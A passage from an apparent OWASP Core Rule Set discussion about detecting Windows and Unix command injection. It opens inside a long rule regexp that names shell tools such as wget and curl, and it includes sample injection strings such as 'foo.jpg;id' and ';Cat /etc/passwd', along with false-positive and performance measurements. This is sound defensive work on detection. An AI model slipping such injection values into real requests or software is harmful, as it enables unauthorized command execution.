,2}t|c[\"\^]{0,2}m[\"\^]{0,2}d)|v[\"\^]{0,2}d[\"\^]{0,2}e)|e[\"\^]{0,2}r[\"\^]{0,2}t[\"\^]{0,2}(?:u[\"\^]{0,2}t[\"\^]{0,2}i[\"\^]{0,2}l|r[\"\^]{0,2}e[\"\^]{0,2}q)|a[\"\^]{0,2}(?:c[\"\^]{0,2}l[\"\^]{0,2}s|l[\"\^]{0,2}l|t)|m[\"\^]{0,2}d(?:[\"\^]{0,2}k[\"\^]{0,2}e[\"\^]{0,2}y)?|i[\"\
^]{0,2}p[\"\^]{0,2}h[\"\^]{0,2}e[\"\^]{0,2}r|u[\"\^]{0,2}r[\"\^]{0,2}l|v[\"\^]{0,2}p[\"\^]{0,2}a|p(?:[\"\^]{0,2}[ip])?|d)|r[\"\^]{0,2}(?:e[\"\^]{0,2}(?:g(?:[\"\^]{0,2}(?:s[\"\^]{0,2}v[\"\^]{0,2}r[\"\^]{0,2}3[\"\^]{0,2}2|e[\"\^]{0,2}d[\"\^]{0,2}i[\"\^]{0,2}t|i[\"\^]{0,2}n[\"\^]{0,2}i))?|c[\"\^]{0,2}o[\"\^]{0,2}v[\"\^]{0,2}e[\"\^]{0,2}r|p[\"\^]{0,2}l[\"\^]{0,2}a[\"\^]{0,2}c[\"\^]{0,2}e|n(?:[\"\^]{0,2}a[\"\^]{0,2}m[\"\^]{0,2}e)?|s[\"\^]{0,2}e[\"\^]{0,2}t|m)|u[\"\^]{0,2}(?:n(?:[\"\^]{0,2}(?:d[\"\^]{0,2}l[\"\^]{0,2}l[\"\^]{0,2}3[\"\^]{0,2}2|a[\"\^]{0,2}s))?|b[\"\^]{0,2}y[\"\^]{0,2}(?:1(?:[\"\^]{0,2}[89])?|2[\"\^]{0,2}[012]))|a[\"\^]{0,2}(?:s[\"\^]{0,2}(?:p[\"\^]{0,2}h[\"\^]{0,2}o[\"\^]{0,2}n[\"\^]{0,2}e|d[\"\^]{0,2}i[\"\^]{0,2}a[\"\^]{0,2}l)|r)|m(?:[\"\^]{0,2}(?:t[\"\^]{0,2}s[\"\^]{0,2}h[\"\^]{0,2}a[\"\^]{0,2}r[\"\^]{0,2}e|d[\"\^]{0,2}i[\"\^]{0,2}r|o))?|o[\"\^]{0,2}(?:b[\"\^]{0,2}o[\"\^]{0,2}c[\"\^]{0,2}o[\"\^]{0,2}p[\"\^]{0,2}y|u[\"\^]{0,2}t[\"\^]{0,2}e)|s[\"\^]{0,2}(?:y[\"\^]{0,2}n[\"\^]{0,2}c|n(?:[\"\^]{0,2}p)?)|(?:c[\"\^]{0,2})?j[\"\^]{0,2}b|(?:w[\"\^]{0,2}m[\"\^]{0,2})?i|v(?:[\"\^]{0,2}p[\"\^]{0,2}a)?|(?:b[\"\^]{0,2})?p|d(?:[\"\^]{0,2}r)?|n[\"\^]{0,2}[ip])|m[\"\^]{0,2}(?:[pv]|y[\"\^]{0,2}s[\"\^]{0,2}q[\"\^]{0,2}l(?:[\"\^]{0,2}(?:d[\"\^]{0,2}u[\"\^]{0,2}m[\"\^]{0,2}p(?:[\"\^]{0,2}s[\"\^]{0,2}l[\"\^]{0,2}o[\"\^]{0,2}w)?|h[\"\^]{0,2}o[\"\^]{0,2}t[\"\^]{0,2}c[\"\^]{0,2}o[\"\^]{0,2}p[\"\^]{0,2}y|a[\"\^]{0,2}d[\"\^]{0,2}m[\"\^]{0,2}i[\"\^]{0,2}n|s[\"\^]{0,2}h[\"\^]{0,2}o[\"\^]{0,2}w))?|o[\"\^]{0,2}(?:u[\"\^]{0,2}n[\"\^]{0,2}t(?:[\"\^]{0,2}v[\"\^]{0,2}o[\"\^]{0,2}l)?|v[\"\^]{0,2}e(?:[\"\^]{0,2}u[\"\^]{0,2}s[\"\^]{0,2}e[\"\^]{0,2}r)?|[dr][\"\^]{0,2}e)|s[\"\^]{0,2}(?:i[\"\^]{0,2}(?:n[\"\^]{0,2}f[\"\^]{0,2}o[\"\^]{0,2}3[\"\^]{0,2}2|e[\"\^]{0,2}x[\"\^]{0,2}e[\"\^]{0,2}c)|t[\"\^]{0,2}s[\"\^]{0,2}c|g)|k[\"\^]{0,2}(?:l[\"\^]{0,2}i[\"\^]{0,2}n[\"\^]{0,2}k|d[\"\^]{0,2}i[\"\^]{0,2}r)|(?:a[\"\^]{0,2}p[\"\^]{0,2}i[\"\^]{0,2}s[\"\^]{0,2}e[\"\^]{0,2}n[\"\^]{0,2})?d|e[\"\^]{0,2}(?:a[\"\^
]{0,2}s[\"\^]{0,2}u[\"\^]{0,2}r[\"\^]{0,2}e|m)|(?:b[\"\^]{0,2}s[\"\^]{0,2}a[\"\^]{0,2}c[\"\^]{0,2}l[\"\^]{0,2})?i)|d[\"\^]{0,2}(?:e[\"\^]{0,2}(?:l(?:[\"\^]{0,2}(?:p[\"\^]{0,2}r[\"\^]{0,2}o[\"\^]{0,2}f|t[\"\^]{0,2}r[\"\^]{0,2}e[\"\^]{0,2}e))?|v[\"\^]{0,2}(?:m[\"\^]{0,2}g[\"\^]{0,2}m[\"\^]{0,2}t|c[\"\^]{0,2}o[\"\^]{0,2}n)|(?:f[\"\^]{0,2}r[\"\^]{0,2}a|b[\"\^]{0,2}u)[\"\^]{0,2}g)|s[\"\^]{0,2}(?:a[\"\^]{0,2}(?:c[\"\^]{0,2}l[\"\^]{0,2}s|d[\"\^]{0,2}d)|q[\"\^]{0,2}u[\"\^]{0,2}e[\"\^]{0,2}r[\"\^]{0,2}y|m[\"\^]{0,2}o[\"\^]{0,2}(?:v[\"\^]{0,2}e|d)|g[\"\^]{0,2}e[\"\^]{0,2}t|r[\"\^]{0,2}m)|i[\"\^]{0,2}(?:s[\"\^]{0,2}k[\"\^]{0,2}(?:s[\"\^]{0,2}h[\"\^]{0,2}a[\"\^]{0,2}d[\"\^]{0,2}o[\"\^]{0,2}w|p[\"\^]{0,2}a[\"\^]{0,2}r[\"\^]{0,2}t)|r(?:[\"\^]{0,2}u[\"\^]{0,2}s[\"\^]{0,2}e)?|f[\"\^]{0,2}f)|(?:r[\"\^]{0,2}i[\"\^]{0,2}v[\"\^]{0,2}e[\"\^]{0,2}r[\"\^]{0,2}q[\"\^]{0,2}u[\"\^]{0,2}e[\"\^]{0,2}r|o[\"\^]{0,2}s[\"\^]{0,2}k[\"\^]{0,2}e)[\"\^]{0,2}y|n[\"\^]{0,2}s[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}a[\"\^]{0,2}t|a[\"\^]{0,2}t[\"\^]{0,2}e|b[\"\^]{0,2}p)|g[\"\^]{0,2}(?:[uv]|a[\"\^]{0,2}(?:t[\"\^]{0,2}h[\"\^]{0,2}e[\"\^]{0,2}r[\"\^]{0,2}n[\"\^]{0,2}e[\"\^]{0,2}t[\"\^]{0,2}w[\"\^]{0,2}o[\"\^]{0,2}r[\"\^]{0,2}k[\"\^]{0,2}i[\"\^]{0,2}n[\"\^]{0,2}f[\"\^]{0,2}o|l)|p(?:[\"\^]{0,2}(?:r[\"\^]{0,2}e[\"\^]{0,2}s[\"\^]{0,2}u[\"\^]{0,2}l[\"\^]{0,2}t|u[\"\^]{0,2}p[\"\^]{0,2}d[\"\^]{0,2}a[\"\^]{0,2}t[\"\^]{0,2}e|s))?|(?:l[\"\^]{0,2}o[\"\^]{0,2}b[\"\^]{0,2}a[\"\^]{0,2})?l|e[\"\^]{0,2}t[\"\^]{0,2}m[\"\^]{0,2}a[\"\^]{0,2}c|(?:r[\"\^]{0,2}o[\"\^]{0,2}u|b)[\"\^]{0,2}p|s[\"\^]{0,2}(?:n(?:[\"\^]{0,2}p)?|v)|o[\"\^]{0,2}t[\"\^]{0,2}o|w[\"\^]{0,2}m[\"\^]{0,2}i|c(?:[\"\^]{0,2}[ims])?|i(?:[\"\^]{0,2}t)?|m(?:[\"\^]{0,2}o)?|j[\"\^]{0,2}b)|t[\"\^]{0,2}(?:a[\"\^]{0,2}(?:s[\"\^]{0,2}k[\"\^]{0,2}(?:k[\"\^]{0,2}i[\"\^]{0,2}l[\"\^]{0,2}l|l[\"\^]{0,2}i[\"\^]{0,2}s[\"\^]{0,2}t)|k[\"\^]{0,2}e[\"\^]{0,2}o[\"\^]{0,2}w[\"\^]{0,2}n)|s[\"\^]{0,2}(?:d[\"\^]{0,2}i[\"\^]{0,2}s[\"\^]{0,2}c[\"\^]{0,2}o|s[\"\^]{0,2}h[\"\^]{0,2}u[\"\^]{0,2}t[\"
\^]{0,2}d)[\"\^]{0,2}n|i[\"\^]{0,2}(?:m[\"\^]{0,2}e(?:[\"\^]{0,2}o[\"\^]{0,2}u[\"\^]{0,2}t)?|t[\"\^]{0,2}l[\"\^]{0,2}e)|r[\"\^]{0,2}(?:a[\"\^]{0,2}c[\"\^]{0,2}e[\"\^]{0,2}r[\"\^]{0,2}t|e[\"\^]{0,2}e)|y[\"\^]{0,2}p[\"\^]{0,2}e(?:[\"\^]{0,2}p[\"\^]{0,2}e[\"\^]{0,2}r[\"\^]{0,2}f)?|e[\"\^]{0,2}(?:l[\"\^]{0,2}n[\"\^]{0,2}e[\"\^]{0,2}t|e)|l[\"\^]{0,2}i[\"\^]{0,2}s[\"\^]{0,2}t)|e[\"\^]{0,2}(?:x[\"\^]{0,2}(?:p[\"\^]{0,2}(?:l[\"\^]{0,2}o[\"\^]{0,2}r[\"\^]{0,2}e[\"\^]{0,2}r|a[\"\^]{0,2}n[\"\^]{0,2}d|o[\"\^]{0,2}r[\"\^]{0,2}t)|(?:t[\"\^]{0,2}r[\"\^]{0,2}a[\"\^]{0,2}c|i)[\"\^]{0,2}t|e[\"\^]{0,2}c|s[\"\^]{0,2}n)|(?:v[\"\^]{0,2}e[\"\^]{0,2}n[\"\^]{0,2}t[\"\^]{0,2}c[\"\^]{0,2}r[\"\^]{0,2}e[\"\^]{0,2}a[\"\^]{0,2}t|r[\"\^]{0,2}a[\"\^]{0,2}s)[\"\^]{0,2}e|n[\"\^]{0,2}d[\"\^]{0,2}l[\"\^]{0,2}o[\"\^]{0,2}c[\"\^]{0,2}a[\"\^]{0,2}l|p[\"\^]{0,2}(?:c[\"\^]{0,2}s[\"\^]{0,2}v|a[\"\^]{0,2}l|s[\"\^]{0,2}n)|(?:g[\"\^]{0,2}r[\"\^]{0,2}e|b)[\"\^]{0,2}p|c[\"\^]{0,2}h[\"\^]{0,2}o|t[\"\^]{0,2}s[\"\^]{0,2}n)|w[\"\^]{0,2}(?:(?:s[\"\^]{0,2}c[\"\^]{0,2}r[\"\^]{0,2}i[\"\^]{0,2}p|u[\"\^]{0,2}a[\"\^]{0,2}u[\"\^]{0,2}c[\"\^]{0,2}l|g[\"\^]{0,2}e)[\"\^]{0,2}t|i[\"\^]{0,2}n[\"\^]{0,2}(?:d[\"\^]{0,2}i[\"\^]{0,2}f[\"\^]{0,2}f|m[\"\^]{0,2}s[\"\^]{0,2}d[\"\^]{0,2}p|r[\"\^]{0,2}[ms])|h[\"\^]{0,2}(?:(?:e[\"\^]{0,2}r|i[\"\^]{0,2}l)[\"\^]{0,2}e|o[\"\^]{0,2}a[\"\^]{0,2}m[\"\^]{0,2}i)|e[\"\^]{0,2}v[\"\^]{0,2}t[\"\^]{0,2}u[\"\^]{0,2}t[\"\^]{0,2}i[\"\^]{0,2}l|a[\"\^]{0,2}i[\"\^]{0,2}t[\"\^]{0,2}f[\"\^]{0,2}o[\"\^]{0,2}r|r[\"\^]{0,2}i[\"\^]{0,2}t[\"\^]{0,2}e|m[\"\^]{0,2}i[\"\^]{0,2}c|j[\"\^]{0,2}b)|n[\"\^]{0,2}(?:[iv]|e[\"\^]{0,2}t(?:[\"\^]{0,2}(?:s[\"\^]{0,2}(?:t[\"\^]{0,2}a[\"\^]{0,2}t|v[\"\^]{0,2}c|h)|c[\"\^]{0,2}a[\"\^]{0,2}t|d[\"\^]{0,2}o[\"\^]{0,2}m))?|t[\"\^]{0,2}(?:b[\"\^]{0,2}a[\"\^]{0,2}c[\"\^]{0,2}k[\"\^]{0,2}u[\"\^]{0,2}p|r[\"\^]{0,2}i[\"\^]{0,2}g[\"\^]{0,2}h[\"\^]{0,2}t[\"\^]{0,2}s)|s[\"\^]{0,2}(?:l[\"\^]{0,2}o[\"\^]{0,2}o[\"\^]{0,2}k[\"\^]{0,2}u[\"\^]{0,2}p|n)|b[\"\^]{0,2}t[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}a[
\"\^]{0,2}t|m[\"\^]{0,2}(?:a[\"\^]{0,2}p|o)|c(?:[\"\^]{0,2}a[\"\^]{0,2}t)?|a[\"\^]{0,2}l|d[\"\^]{0,2}r|o[\"\^]{0,2}w)|f[\"\^]{0,2}(?:[cw]|o[\"\^]{0,2}r(?:[\"\^]{0,2}(?:f[\"\^]{0,2}i[\"\^]{0,2}l[\"\^]{0,2}e[\"\^]{0,2}s|e[\"\^]{0,2}a[\"\^]{0,2}c[\"\^]{0,2}h|m[\"\^]{0,2}a[\"\^]{0,2}t))?|r[\"\^]{0,2}e[\"\^]{0,2}e[\"\^]{0,2}d[\"\^]{0,2}i[\"\^]{0,2}s[\"\^]{0,2}k|i[\"\^]{0,2}n[\"\^]{0,2}d(?:[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}r)?|(?:s[\"\^]{0,2}u[\"\^]{0,2}t[\"\^]{0,2}i[\"\^]{0,2})?l|t(?:[\"\^]{0,2}(?:y[\"\^]{0,2}p[\"\^]{0,2}e|p))?|g[\"\^]{0,2}r[\"\^]{0,2}e[\"\^]{0,2}p)|i[\"\^]{0,2}(?:p[\"\^]{0,2}(?:c[\"\^]{0,2}(?:o[\"\^]{0,2}n[\"\^]{0,2}f[\"\^]{0,2}i[\"\^]{0,2}g|s[\"\^]{0,2}v)|a[\"\^]{0,2}l|m[\"\^]{0,2}o|s[\"\^]{0,2}n)|f[\"\^]{0,2}m[\"\^]{0,2}e[\"\^]{0,2}m[\"\^]{0,2}b[\"\^]{0,2}e[\"\^]{0,2}r|r[\"\^]{0,2}b(?:[\"\^]{0,2}(?:1(?:[\"\^]{0,2}[89])?|2[\"\^]{0,2}[012]))?|c[\"\^]{0,2}(?:a[\"\^]{0,2}c[\"\^]{0,2}l[\"\^]{0,2}s|m)|(?:w[\"\^]{0,2}m[\"\^]{0,2})?i|e[\"\^]{0,2}x|h[\"\^]{0,2}y|s[\"\^]{0,2}e|d)|a[\"\^]{0,2}(?:d[\"\^]{0,2}(?:d[\"\^]{0,2}u[\"\^]{0,2}s[\"\^]{0,2}e[\"\^]{0,2}r[\"\^]{0,2}s|m[\"\^]{0,2}o[\"\^]{0,2}d[\"\^]{0,2}c[\"\^]{0,2}m[\"\^]{0,2}d)|s[\"\^]{0,2}s[\"\^]{0,2}o[\"\^]{0,2}c(?:[\"\^]{0,2}i[\"\^]{0,2}a[\"\^]{0,2}t)?|t[\"\^]{0,2}t[\"\^]{0,2}r[\"\^]{0,2}i[\"\^]{0,2}b|l[\"\^]{0,2}i[\"\^]{0,2}a[\"\^]{0,2}s|r[\"\^]{0,2}p)|b[\"\^]{0,2}(?:(?:c[\"\^]{0,2}d[\"\^]{0,2}(?:b[\"\^]{0,2}o[\"\^]{0,2}o|e[\"\^]{0,2}d[\"\^]{0,2}i)|r[\"\^]{0,2}o[\"\^]{0,2}w[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}a)[\"\^]{0,2}t|i[\"\^]{0,2}t[\"\^]{0,2}s[\"\^]{0,2}a[\"\^]{0,2}d[\"\^]{0,2}m[\"\^]{0,2}i[\"\^]{0,2}n|o[\"\^]{0,2}o[\"\^]{0,2}t[\"\^]{0,2}c[\"\^]{0,2}f[\"\^]{0,2}g)|q[\"\^]{0,2}(?:p[\"\^]{0,2}r[\"\^]{0,2}o[\"\^]{0,2}c[\"\^]{0,2}e[\"\^]{0,2}s[\"\^]{0,2}s|w[\"\^]{0,2}i[\"\^]{0,2}n[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}a|g[\"\^]{0,2}r[\"\^]{0,2}e[\"\^]{0,2}p|u[\"\^]{0,2}e[\"\^]{0,2}r[\"\^]{0,2}y)|l[\"\^]{0,2}(?:[ps]|o[\"\^]{0,2}g[\"\^]{0,2}(?:e[\"\^]{0,2}v[\"\^]{0,2}e[\"\^]{0,2}n[\"\^]{0,2}t|t[\"\^]{0,2}i[\
"\^]{0,2}m[\"\^]{0,2}e|m[\"\^]{0,2}a[\"\^]{0,2}n|o[\"\^]{0,2}f[\"\^]{0,2}f)|a[\"\^]{0,2}b[\"\^]{0,2}e[\"\^]{0,2}l)|h[\"\^]{0,2}(?:o[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}n[\"\^]{0,2}a[\"\^]{0,2}m[\"\^]{0,2}e|i[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}o[\"\^]{0,2}r[\"\^]{0,2}y|e[\"\^]{0,2}l[\"\^]{0,2}p)|u[\"\^]{0,2}(?:n[\"\^]{0,2}(?:r[\"\^]{0,2}a[\"\^]{0,2}r|z[\"\^]{0,2}i[\"\^]{0,2}p)|s[\"\^]{0,2}r[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}a[\"\^]{0,2}t)|o[\"\^]{0,2}(?:p[\"\^]{0,2}e[\"\^]{0,2}n[\"\^]{0,2}f[\"\^]{0,2}i[\"\^]{0,2}l[\"\^]{0,2}e[\"\^]{0,2}s|g[\"\^]{0,2}v|h)|x[\"\^]{0,2}c[\"\^]{0,2}(?:a[\"\^]{0,2}c[\"\^]{0,2}l[\"\^]{0,2}s|o[\"\^]{0,2}p[\"\^]{0,2}y)|v[\"\^]{0,2}(?:e[\"\^]{0,2}r(?:[\"\^]{0,2}i[\"\^]{0,2}f[\"\^]{0,2}y)?|o[\"\^]{0,2}l)|j[\"\^]{0,2}a[\"\^]{0,2}v[\"\^]{0,2}a|k[\"\^]{0,2}i[\"\^]{0,2}l[\"\^]{0,2}l|7[\"\^]{0,2}z(?:[\"\^]{0,2}[ar])?|z[\"\^]{0,2}i[\"\^]{0,2}p)(\.\w+)?\b" \
    "msg:'Remote Command Execution: Windows Command Injection',\
    phase:request,\
    rev:'3',\
    ver:'OWASP_CRS/3.0.0',\
    maturity:'9',\
    accuracy:'8',\
    capture,\
    t:none,\
    ctl:auditLogParts=+E,\
    block,\
    id:932110,\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-windows',\
    tag:'attack-rce',\
    tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
    tag:'WASCTC/WASC-31',\
    tag:'OWASP_TOP_10/A1',\
    tag:'PCI/6.5.2',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    severity:'CRITICAL',\
    setvar:'tx.msg=%{rule.msg}',\
    setvar:tx.rce_score=+%{tx.critical_anomaly_score},\
    setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},\
    setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RCE-%{matched_var_name}=%{tx.0}"

The regexp is not 100% accurate yet. Some tests are failing. I'm just testing the concept. Performance tests not done, but it doesn't feel slow. No complaints from Apache about the long lines.

Here is the improvement on false positives on the Reddit comments. The FP rate has already gone down a lot. Lots of remaining FPs are due to direct RCE with dictionary terms - comments starting with For, While etc. Note that the old pmf rule did not even catch these.

Request Scores	pmf	regexp v0
0	81239	115642
5	42998	7452
10	1847	3005
15	211	177
20	16	33
25	6	5
30	1	4
35	2	0
40	0	1

Rule hits with pmf (before):

Rule ID	Hits	Explanation
`932100`	44203	Remote Command Execution (RCE) Attempt

Rule hits with regexp v0 (after):

Rule ID	Hits	Explanation
`932100`	5072	Remote Command Execution: Unix command injection
`932110`	5874	Remote Command Execution: Windows Command Injection

Finally I've added some tests from fuzzdb and audit logs. Need to add more!

Before proceeding to finetune the approach, the main question is, are we all on board with adding a regexp of this complexity to the CRS?

(Edit: removed very long test output from this post, see os-commands.txt for updated testcases.)

@lifeforms, it all depends on the description which comes with this rule. All I ask for is a detailed explanation of the regex and the one-liner used to generate it. The user has to be able to re-create the regex herself. If that is granted, I am totally on board.
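To make the "re-create the regex" request concrete, here is a minimal Python sketch of how such a pattern could be generated from a word list. It is not the tool actually used for the rules above: the function names and the three sample words are hypothetical, it assumes the Unix evasion class (backslash and quotes, up to two between letters), and it does no prefix merging, so its output is longer than the hand-optimized regexp. The injection preamble is left out.

```python
import re

# Characters a Unix shell silently drops inside a command word.
# Assumption: up to two of them may appear between any two letters.
EVASION = r"""[\\'"]{0,2}"""

def word_to_pattern(word):
    """Interleave the evasion class between the escaped letters of one command."""
    return EVASION.join(re.escape(ch) for ch in word)

def build_regex(words):
    """Join all command patterns into one alternation (longest first, no prefix merging)."""
    ordered = sorted(set(words), key=lambda w: (-len(w), w))
    return "(?:" + "|".join(word_to_pattern(w) for w in ordered) + r")\b"

# Hypothetical sample; a real list would be read from a data file.
pattern = re.compile(build_regex(["wget", "curl", "id"]))

print(bool(pattern.search("w'g\\et http://example.com")))  # True
print(bool(pattern.search("hello world")))                  # False
```

Keeping the word list in a plain file and regenerating the pattern from it would let a user add or remove commands without editing the regexp by hand.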

You said it's only a proof of concept. So I am looking forward to its final implementation.

FP is probably the most important issue, so I did some more FP experiments on the Reddit comments:

First, I ran CRS3 at PL1 without the RCE rules, to demonstrate the base rate of false positives caused by all other CRS rules. It's important to know this number, because the total FP rate will never go below that percentage.
I ran the new regexps, but restricted them so they only test proper shell injections (e.g. a command after ; char like ;id) and not direct RCE vulnerabilities (command at the start of payload, like id).
I ran the above, but in addition, made the Unix rule case-sensitive (no more Cat).
I ran the above, but in addition, disabled the Windows rule.
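The difference between these variants can be sketched in Python with a toy pattern. The three-word command list and the reduced set of injection markers below are assumptions for illustration only; the real rules use the much larger regexps shown earlier.

```python
import re

COMMANDS = r"(?:cat|id|wget)"   # hypothetical three-word list
INJECT = r"[;|&`\n\r]"          # a few injection markers, not the full preamble

v0 = re.compile(rf"(?i)(?:^|{INJECT})\s*{COMMANDS}\b")   # direct + injection, any case
v0_1 = re.compile(rf"(?i){INJECT}\s*{COMMANDS}\b")       # injection only, any case
v0_2 = re.compile(rf"{INJECT}\s*{COMMANDS}\b")           # injection only, case-sensitive

for payload in ["id", ";id", ";Cat /etc/passwd"]:
    print(payload, [bool(r.search(payload)) for r in (v0, v0_1, v0_2)])
# id [True, False, False]
# ;id [True, True, True]
# ;Cat /etc/passwd [True, True, False]
```

Dropping the start-of-string alternative is what removes hits on payloads that merely begin with a dictionary word.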

False positive rates on Reddit comments:

Variant	RCE coverage	False positives
CRS3 without RCE rules	none	2.3%
"Before" situation using pmf	301 unix/win, injection + case	35.6%
v0: Assembled regexps	267 unix+384 win, injection + case + direct	8.5%
v0.1: Check only inject char	267 unix+384 win, injection + case	5.3%
v0.2: Unix case-sensitive	267 unix+384 win, injection	4.8%
v0.3: Unix only	267 unix, injection + case	4.1%
v0.4: Unix only, case-sensitive	267 unix, injection	2.8%

So:

The rest of the CRS already gives 2.3% FP. As said earlier, this is almost all due to 942250 (SQL HAVING...). Not happy with that, but that's another issue.
People who run the full regexps would suffer 8.5% FP. This is still very high in my opinion and unsuited for PL1.
If at PL1 we only check true injections, plus we check Unix injections case-sensitively, we have already reduced the false positives to 4.8%. This would get rid of a lot of possibly problematic FP like ?orderby=id and ?subject=For my dear father. I think it may not be worth blocking those cases in PL1, but we might introduce a sibling rule which still checks for some stuff like curl and wget at the beginning of a payload.
Windows keywords give relatively many FP, as I expected. A Unix admin (who could whitelist the Windows platform rules) on PL1 would be at 2.8% FP. In that situation, the Unix admin is already very much near the baseline FP rate of 2.3%, so their false positives on forum comments would only be raised by 0.5 percentage points relative to the rest of the CRS. This looks quite acceptable.

I will have to analyze the matched data to see if we can push the numbers down significantly by excluding some lower-value keywords. However, this could be a tricky task. But I bet there will be some low hanging fruit keywords that might knock off a bit of FP.

The regexp still needs to be fixed and tweaked, but I'm not expecting that to have significant impact on FP.

I tried out the t:cmdLine transformation, and it looks like it deals perfectly with all the escape characters, including ^. It's really great.

It seems a perfect fit for the Unix rule, because we can completely get rid of all the complex regexp character magic.

On the Windows rule it will destroy backslashes in the paths, so we'll get strings like C:WindowsSystem32cmd, which will not match. But maybe we could make the Windows regexp lax enough to match such scenarios. Preventing kilobytes of weird regexps in the CRS could be worth it... But it's unclear what the effect on FP would be.

I wonder if we could get a t:cmdLineWin which would be identical to t:cmdLine but with the exception of

cmdLine: deleting all backslashes
cmdLineWin: deleting spaces before a backslash

(The deleting spaces is what cmdLine does with forward slashes.)

Not an immediate solution, but 2-3 years down the line, we would be very pleased.

Unfortunately my hopes of using t:cmdLine were crushed, as it replaces ; characters by spaces. So we can't see where many injections begin (such as foo.jpg;id). It's a very nice transformation when you know you're dealing with a command, but in our case I don't think it can be used. It also lowercases the string which we may or may not want.
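To show why this matters, here is a rough Python approximation of the steps that the ModSecurity reference manual lists for t:cmdLine. The function name `cmdline_like` is made up, and the real transformation works in a single pass in C, so treat this as a sketch of the documented behaviour and not as the implementation.

```python
import re

def cmdline_like(value):
    """Approximate the documented steps of t:cmdLine (not the real implementation)."""
    value = re.sub(r"""[\\"'^]""", "", value)   # drop backslashes, quotes, carets
    value = re.sub(r"\s+(?=[/(])", "", value)   # drop whitespace before / or (
    value = re.sub(r"[,;]", " ", value)         # commas and semicolons become spaces
    value = re.sub(r"\s+", " ", value)          # collapse whitespace runs
    return value.lower()

print(cmdline_like('c^m^d.exe /c "DIR"'))           # cmd.exe/c dir
print(cmdline_like("foo.jpg;id"))                   # foo.jpg id
print(cmdline_like("C:\\Windows\\System32\\cmd"))   # c:windowssystem32cmd
```

The second example loses the `;` that marks where the injected command starts, and the third shows the collapsed Windows path mentioned earlier.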

I thought of a t:cmdLineWin and t:cmdLineUnix but I think this transformation does a bit too much. It would be better for rule writers to have a toolbox of generic transformations which can be parametrized. A thing we could have used here is something like t:replace:[\^\'\"\\]:. Such a system would also allow us to do complex replacements on other formats -- for instance you can remove /*comments*/ from code without adding a t:removeComments transformation. This would be truly extensible and powerful.
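A parametrized replace does not exist in ModSecurity as far as this thread is concerned, so the following Python sketch only illustrates the idea. The function name `replace_transform` and its signature are hypothetical.

```python
import re

def replace_transform(value, pattern, replacement=""):
    """Hypothetical parametrized transformation: a regex substitution on the input."""
    return re.sub(pattern, replacement, value)

# Strip only the escape characters; the ';' injection marker survives.
print(replace_transform("foo.jpg;c^a't /etc/passwd", r"""[\^'"\\]"""))  # foo.jpg;cat /etc/passwd

# The same primitive can drop /* comments */ from a payload.
print(replace_transform("sel/*x*/ect", r"/\*.*?\*/"))  # select
```

Because the caller chooses the character class, the `;` stays in place and a simple command regexp can still see where the injection begins.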

But for now... In this case we can achieve the same result with regexps. It's just more tedious and ugly. And we'll have an 8kB regexp (Unix) plus a 10kB regexp (Windows) in the CRS. Maybe even siblings in higher PLs. :( But it will do. Once you find an evasion, you can't really ignore it...

Too bad. Yes, t:cmdLine is a bit of a mingle-mangle. But it looked like the perfect fit at first sight. I thought about your dynamic transformation too. I think t:replace is hard to configure. But a repeatable (it's a transformation pipeline after all) t:tr... could be fairly simple. It does not cover your comments example though. As configurable transformations are a new concept, we might be shooting over the top and this is better done in Lua (which is not an option for CRS, though).

I agree, for the time being, we ought to go with the regex construct.

For me, the relevant number in your stats is v0.2, as this will likely be the PL1 default setup. 4.8% is really a lot. I hope you can shift some of the keywords away - or we might need special exceptions to weed out FPs.

I hope so too. I've now fixed the failing test cases by simplifying the regexp, reducing the rule sizes by about 20%. So my next action item is to look at the matched data and hopefully find some boring stuff that we can ignore!

Keeping my fingers crossed!

Informal performance testing shows that it takes about 1.3% longer to post the whole Reddit dataset (126k requests) when the two regexp rules are added in PL1.

RCE rules	Run 1	Run 2	Run 3	Average (s)	Slowdown
CRS3 without RCE rules	494.8	497.8	499.8	497.5	--
v0.2: Unix case-sensitive	501.0	503.1	507.5	503.9	1.3%
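For reference, the averages and the slowdown figure in the table can be reproduced from the three runs with a few lines of Python. The variable names are arbitrary; the numbers are the ones from the table.

```python
from statistics import mean

baseline = [494.8, 497.8, 499.8]   # CRS3 without RCE rules (seconds)
with_rce = [501.0, 503.1, 507.5]   # v0.2: Unix case-sensitive (seconds)

base_avg = mean(baseline)
rce_avg = mean(with_rce)
slowdown = (rce_avg - base_avg) / base_avg * 100

print(f"{base_avg:.1f} {rce_avg:.1f} {slowdown:.1f}%")  # 497.5 503.9 1.3%
```

With only three runs per variant and a spread of several seconds within each, the 1.3% figure is an informal estimate.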

That's totally worth it and surprisingly a small addition.

@dune73 Mmm, I found it more than I had initially expected. I just timed the complete requests, not only the time spent in CRS. Adding 1.3% of server load for a rule seems a lot. Though this was a trivial test only requesting a small php script; if the web server really does work, the relative weight of CRS processing would be smaller. Maybe the difference is just due to things like writing 5000 times to the audit log...

Hmm. Can you run with ModSec, but without any rules?

@dune73 Sure, but time is a bit compressed right now. I think performance is likely acceptable for the initial 3.0.0-rc1 but I'll keep it as a note to do a more thorough perf check later. (If it's problematic, we could do a trick like doing a pre-filter on the special characters using a pmf rule, for instance. But maybe it doesn't need to go into 3.0.0.)

Good thinking.

Would that be (white)space, quotes and slashes? Or what do you have in mind?

For the pre-filter you mean? I thought maybe we can do a pre-check on special characters like ; & | { \r \n etc. If none of those characters are in the string, we might improve performance by skipping over the BIG regexp rules. But I'm not sure. The pre-check might even reduce performance: it's an extra check that costs more time in the worst case.
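The pre-check idea can be sketched in Python as follows. The stand-in regexp and the function name `is_suspicious` are hypothetical, and the trigger set contains only the characters named above; in the CRS the cheap check would be a separate rule in front of the big regexp rules.

```python
import re

# Trigger characters taken from the list above.
TRIGGER_CHARS = frozenset(";&|{\r\n")

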